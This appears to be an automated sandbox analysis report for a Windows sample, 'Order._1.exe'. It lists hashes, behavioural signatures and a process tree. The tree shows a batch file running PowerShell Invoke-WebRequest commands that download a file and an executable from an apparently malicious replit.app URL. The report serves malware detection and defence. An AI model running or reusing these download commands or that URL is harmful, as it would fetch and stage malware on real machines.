Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
30/07/2024, 09:10
Static task
static1
Behavioral task
behavioral1
Sample
Order._1.exe
Resource
win7-20240705-en
General
-
Target
Order._1.exe
-
Size
288KB
-
MD5
587be0c9be93274c3d38ef27c3a50aa4
-
SHA1
6808c0da1276c7ad2021ffb7c0b8d743f5c87b35
-
SHA256
cf4ff6cb9038c130e7b6d76daf2af62d018541c3d561d5e0aba8a34614ebc5d8
-
SHA512
5d2dbadb93ae2d91c3e7af58be9b28a7270a86b1c3b2bfbae64f232a06f26efa72162dc4adb22ce1f269429eecb2d4b5b44e1c1494658de702c1f2dad0c9c879
-
SSDEEP
3072:Cq6+ouCpk2mpcWJ0r+QNTBf2Wk1qXkXRA4XTZ5N:Cldk1cWQRNTB+l8KN
Malware Config
Signatures
-
pid Process 2316 powershell.exe 2696 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Order._1.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2316 powershell.exe 2696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2316 powershell.exe Token: SeDebugPrivilege 2696 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2004 wrote to memory of 1656 2004 Order._1.exe 29 PID 2004 wrote to memory of 1656 2004 Order._1.exe 29 PID 2004 wrote to memory of 1656 2004 Order._1.exe 29 PID 2004 wrote to memory of 1656 2004 Order._1.exe 29 PID 1656 wrote to memory of 2316 1656 cmd.exe 31 PID 1656 wrote to memory of 2316 1656 cmd.exe 31 PID 1656 wrote to memory of 2316 1656 cmd.exe 31 PID 1656 wrote to memory of 2696 1656 cmd.exe 33 PID 1656 wrote to memory of 2696 1656 cmd.exe 33 PID 1656 wrote to memory of 2696 1656 cmd.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\Order._1.exe"C:\Users\Admin\AppData\Local\Temp\Order._1.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F602.tmp\F603.tmp\F604.bat C:\Users\Admin\AppData\Local\Temp\Order._1.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
336B
MD501c5cda0bd57d42a84beff225913c7f6
SHA11047c8ce097c87214b5337c98278f4ce5a5896f7
SHA256454734ff80f0ff62344d6adeaf700983b1d5da605d192226e3a1e40020ec0d31
SHA51276af6d488d7fdf8d701d16e0c884811df4c7a7bf34b74c30f7e993490420ebb895889048ae9ec5ca82d037f49de42028fca751d66915df543cd4394fcff727b2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD54642b21b8f12258876c2f6beddddadeb
SHA1221ff71c5ad1aca6f3740d70bbe5b4de9546661e
SHA256e47fa23763f1f09c4e23e5268ff518ad20e92a38914225903a14180e8691774b
SHA512a3d38076bbab1ed78caf58e09867f70bd1ca4e0ef11388edf3a72943139694aa4529ba141ff426f02080bbc6c977a5f128a0e27d70f4821023fae492e12915f4